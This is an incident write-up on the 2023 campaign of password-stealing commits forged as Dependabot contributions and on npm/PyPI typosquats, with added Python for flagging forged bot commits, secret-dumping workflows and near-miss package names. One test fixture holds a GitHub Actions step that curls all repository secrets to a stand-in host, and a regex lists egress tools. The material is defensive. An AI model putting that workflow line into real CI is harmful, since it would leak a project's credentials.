A campaign reported in late September 2023 pushed password-stealing commits disguised as Dependabot contributions into GitHub repositories [1] [2] [3] [4] [5] [6] [7] [8]; the same reports describe counterfeit packages on npm and PyPI that harvest machine information from developers' systems. Together they illustrate the continuing pressure on open-source ecosystems and the software supply chain [7] [8].

Description

The GitHub campaign started from stolen personal access tokens (PATs) [7]. A PAT lets its holder push commits under the victim's account, and the attackers set the author identity of their commits so that they appeared to come from Dependabot [1] [2] [3] [4] [6] [7]. Each forged commit did two things: it added a GitHub Actions workflow that reads the repository's secrets and variables and sends them to an attacker-controlled server [6] [7] [8], and it modified existing JavaScript files to inject a script that captures passwords typed into web forms and exfiltrates them [6] [7]. How the tokens were stolen is unclear [8]; the leading hypothesis is that the developers unknowingly installed a rogue package that harvested them [8]. The atypical commits landed in numerous public and private repositories [6]. Two properties make this easy to miss: a push authenticated with a PAT looks like an ordinary push by the account owner, and the author and committer fields of a git commit are not authenticated, so anyone holding a token can write "dependabot[bot]" into them. Genuine Dependabot commits are created by GitHub's own app and are signed by GitHub, so an unverified commit claiming to be from Dependabot, or a "dependency update" that adds a workflow file or edits application JavaScript, is the thing to check for.
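
The checks just described, as an added example (this is not code from the article, from Checkmarx, or from GitHub): the functions below inspect commit records in the shape of the GitHub REST API commit object (commit.author, commit.committer, commit.verification, files[]) and a workflow file's text. The commit records, file names and workflow snippets are constructed here; the rule that a workflow dumping `toJSON(secrets)` or `toJSON(vars)` next to a network client is exfiltrating is my heuristic, not a published signature.

```python
"""Heuristics for spotting commits that impersonate Dependabot and workflows
that dump repository secrets. Added example; not code from the article,
Checkmarx or GitHub. The commit records are constructed in the shape of the
GitHub REST API commit object (commit.author/committer/verification, files[]).
"""
import re

DEPENDABOT_NAME_RE = re.compile(r"dependabot", re.IGNORECASE)
WORKFLOW_PATH_RE = re.compile(r"^\.github/workflows/.+\.ya?ml$")
JS_PATH_RE = re.compile(r"\.[mc]?js$")
# Assumed heuristic (not a published signature): a workflow that serialises
# every secret or variable AND makes an outbound request is exfiltrating them.
SECRET_DUMP_RE = re.compile(r"toJSON\(\s*(secrets|vars)\s*\)")
EGRESS_RE = re.compile(r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b", re.IGNORECASE)


def claims_dependabot(commit: dict) -> bool:
    """True if the author or committer name pretends to be Dependabot."""
    meta = commit["commit"]
    return any(DEPENDABOT_NAME_RE.search(p["name"]) for p in (meta["author"], meta["committer"]))


def is_forged_dependabot_commit(commit: dict) -> bool:
    """Real Dependabot commits are made by GitHub's app and GitHub-signed, so
    verification.verified is true. A Dependabot name on an unverified commit
    means someone wrote that name into the commit themselves."""
    verified = commit["commit"].get("verification", {}).get("verified", False)
    return claims_dependabot(commit) and not verified


def suspicious_commit_reasons(commit: dict) -> list[str]:
    """Red flags on a commit that claims to be from Dependabot."""
    reasons = []
    if not claims_dependabot(commit):
        return reasons
    if is_forged_dependabot_commit(commit):
        reasons.append("Dependabot identity on a commit GitHub did not verify")
    files = [f["filename"] for f in commit.get("files", [])]
    # Real Dependabot does bump action versions inside workflow files, so this
    # flag is only meaningful together with the verification failure above.
    if any(WORKFLOW_PATH_RE.match(f) for f in files):
        reasons.append("adds or edits a file under .github/workflows/")
    if any(JS_PATH_RE.search(f) for f in files):
        reasons.append("edits JavaScript source, which a manifest/lockfile bump should not do")
    return reasons


def workflow_exfiltrates_secrets(workflow_yaml: str) -> bool:
    """Secret dump plus an outbound HTTP client in the same workflow text."""
    return bool(SECRET_DUMP_RE.search(workflow_yaml)) and bool(EGRESS_RE.search(workflow_yaml))


def scan_commits(commits: list[dict]) -> dict[str, list[str]]:
    """Map sha -> reasons for every commit that is a forged Dependabot commit."""
    return {c["sha"]: suspicious_commit_reasons(c) for c in commits
            if is_forged_dependabot_commit(c)}


def _commit(sha, name, message, verified, files):
    """Build a constructed commit record in the GitHub API shape."""
    person = {"name": name, "email": f"{name}@example.invalid"}
    return {
        "sha": sha,
        "commit": {"author": person, "committer": person, "message": message,
                   "verification": {"verified": verified,
                                    "reason": "valid" if verified else "unsigned"}},
        "files": [{"filename": f} for f in files],
    }


SAMPLE_COMMITS = [  # constructed, not real campaign data
    _commit("a" * 40, "dependabot[bot]", "fix deps", False,
            [".github/workflows/build.yml", "static/js/login.js"]),
    _commit("b" * 40, "dependabot[bot]", "Bump lodash from 4.17.20 to 4.17.21", True,
            ["package.json", "package-lock.json"]),
    _commit("c" * 40, "alice", "Refactor login form", False, ["static/js/login.js"]),
]

MALICIOUS_WORKFLOW = """\
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -X POST --data '${{ toJSON(secrets) }}' https://collector.example.invalid/in
"""

BENIGN_WORKFLOW = """\
name: publish
on: [release]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

if __name__ == "__main__":
    for sha, reasons in scan_commits(SAMPLE_COMMITS).items():
        print(sha[:12], reasons)
    print("malicious workflow:", workflow_exfiltrates_secrets(MALICIOUS_WORKFLOW))
    print("benign workflow:", workflow_exfiltrates_secrets(BENIGN_WORKFLOW))
```

Against a live repository the same records come from `GET /repos/{owner}/{repo}/commits` (list) and `GET /repos/{owner}/{repo}/commits/{sha}` (which adds `files`). The verification check is the decisive one; the path checks only rank how bad a forged commit is, since the genuine bot legitimately edits workflow files when it bumps action versions.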

Alongside the GitHub campaign, the same reports describe activity on npm and PyPI [2] [6]: counterfeit packages that collect machine information and send it to a remote server [2] [3] [5] [6] [7], and a typosquat campaign on npm whose packages masquerade as popular frameworks for the same purpose [3] [6] [7]. Such packages violate the npm Acceptable Use Policy and add to the workload of the maintainers who keep the registries clean [2] [3] [5] [6] [7].
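
A typosquat only works if a near-miss name slips through review, so the check a practitioner wants is one that compares each dependency name against the packages it could be imitating. The following is an added example, not code from the article or from any of the linked reports: the popular-package list and the dependency names are constructed for illustration (a real run would load the registry's download ranking), and the distance budgets are my choice.

```python
"""Near-miss check for dependency names against well-known packages.
Added example; not code from the article or the linked reports. The popular
package list and the dependency names are constructed for illustration; in
practice the list would come from the registry's download ranking.
"""

POPULAR_PACKAGES = ["react", "vue", "angular", "express", "lodash",
                    "axios", "next", "nuxt", "webpack", "typescript"]

SAMPLE_DEPENDENCIES = [  # constructed package.json dependency names
    "react", "react-dom", "raect", "expres", "lodash", "axois",
    "@types/node", "webpak", "typescript",
]


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution and
    adjacent transposition each cost 1. Transpositions matter because swapped
    letters ("axois") are the most common typosquat."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def normalise(name: str) -> str:
    """Drop an npm scope (@org/pkg -> pkg), lower-case, unify separators."""
    bare = name.split("/", 1)[1] if name.startswith("@") and "/" in name else name
    return bare.lower().replace("_", "-")


def find_typosquats(dependencies, popular=POPULAR_PACKAGES, allowlist=frozenset()):
    """Return {dependency: popular_name} for names within a small edit distance
    of a popular package without being that package. Short names get a tighter
    budget so three-letter packages do not match everything."""
    popular_norm = {normalise(p): p for p in popular}
    hits = {}
    for dep in dependencies:
        norm = normalise(dep)
        if norm in popular_norm or dep in allowlist:
            continue
        for cand_norm, cand in popular_norm.items():
            budget = 1 if len(cand_norm) <= 7 else 2
            if damerau_levenshtein(norm, cand_norm) <= budget:
                hits[dep] = cand
                break
    return hits


if __name__ == "__main__":
    for dep, looks_like in find_typosquats(SAMPLE_DEPENDENCIES).items():
        print(f"{dep!r} is one edit away from {looks_like!r}; verify before installing")
```

A hit is a signal, not a verdict: legitimate neighbours such as `vuex` sit one edit from `vue` and belong in the allowlist. Edit distance also does not catch the other masquerade pattern the reports describe, names that embed a framework name with an added word, so those still need a lookup against the framework's official scope or publisher.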

Conclusion

These incidents show threat actors continuing to target open-source ecosystems and the software supply chain [8], with the tooling developers trust (a bot's name on a commit, a CI workflow, a familiar package name) used as cover, and they show the growing use of obfuscation in such attacks. The practical responses follow directly from the reports: treat every PAT as a credential that can push code in your name (scope it narrowly, give it an expiry, and rotate it if a rogue package is suspected), distrust commits that carry a bot identity without GitHub's verified signature, review any change under .github/workflows/ as carefully as a change to production code, and check new dependencies against the popular packages they resemble before installing them.

References

[1] https://cyber.vumetric.com/security-news/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[2] https://patabook.com/technology/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[3] https://osintcorp.net/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[4] https://itauditcybersecurity.blogspot.com/2023/09/github-repositories-hit-by-password.html
[5] https://flyytech.com/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[6] https://thehackernews.com/2023/09/github-repositories-hit-by-password.html
[7] https://www.redpacketsecurity.com/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/
[8] https://beker.uk/2023/09/28/github-repositories-hit-by-password-stealing-commits-disguised-as-dependabot-contributions/